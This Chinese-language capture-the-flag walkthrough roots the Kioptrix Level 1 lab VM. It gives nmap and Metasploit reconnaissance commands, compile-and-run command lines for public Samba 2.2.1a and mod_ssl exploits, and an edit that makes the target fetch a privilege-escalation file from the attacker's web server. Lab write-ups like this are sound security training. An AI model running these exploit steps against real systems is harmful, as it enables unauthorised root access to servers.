一、介绍
运行环境:Virtualbox
攻击机:kali(192.168.56.101)
靶机:Kioptrix_Level1(192.168.56.105)
目标:获取靶机root权限和flag
靶机下载地址:https://www.vulnhub.com/entry/kioptrix-level-1-1,22/
二、信息收集
使用nmap主机发现靶机ip:192.168.56.105
使用nmap端口扫描发现靶机开放端口:22、80、111、139、443、1024
nmap -A 192.168.56.105 -p 1-65535
打开网站未发现可利用的功能点和隐藏信息
根据nmap的扫描结果发现开放了139端口,smb服务,利用nmap脚本扫描139端口,发现靶机存在cve-2009-3103漏洞
nmap 192.168.56.105 -p 139 --script smb*
在网上找了很多exp,发现都利用不了
使用msf探测一下smb服务的版本信息,为samba 2.2.1a
msfconsole
search smb_version
use auxiliary/scanner/smb/smb_version
show options
set rhosts 192.168.56.105
run
三、漏洞利用
使用searchsploit搜索该版本的samba的历史漏洞,发现命令执行漏洞,将exp导出
searchsploit samba 2.2.1a
编译,根据脚本的注释执行脚本
gcc 10.c -o 10
./10 -b 0 -v 192.168.56.105
获得root权限
还有一个方法是利用Apache mod_ssl
漏洞
根据nmap的扫描结果80端口安装Apache/1.3.20 mod_ssl/2.8.4
使用searchsploit搜索mod_ssl的历史漏洞
searchsploit mod_ssl
发现三个对应版本的exp,我们挨个尝试,发现都报错
gcc -o 764 764.c -lcrypto
最后发现是exp的问题,我们下载最新的exp:https://www.exploit-db.com/exploits/47080
编译执行
根据靶机系统和apache的版本选择偏移量,构造命令
./exp 0x6b 192.168.56.105 -c 40
得到apache的权限的shell
理论上应该是root权限,发现在exp执行时,出现报错:找不到ptrace-kmod.c
文件
在exp源码查找出现问题的地方,在309行,会在靶机执行命令下载ptrace-kmod.c
文件,而我的靶机网络设置的是仅主机模式,下载不了
nl exp.c| grep ptrace
我们可以将ptrace-kmod.c
文件下载到本地,然后在本地开一个web服务器,让靶机请求攻击机获取ptrace-kmod.c
文件
cd /var/www/html
wget https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c
service apache2 start
修改exp源码,将请求改为攻击机的ip
保存编译执行,得到root权限
参考链接:Vulnhub系列:Kioptix Level 1_vulnhub kioptix level 1-CSDN博客
KIOPTRIX: LEVEL 1 通关详解_kioptrix level 1 - 搜狗搜索-CSDN博客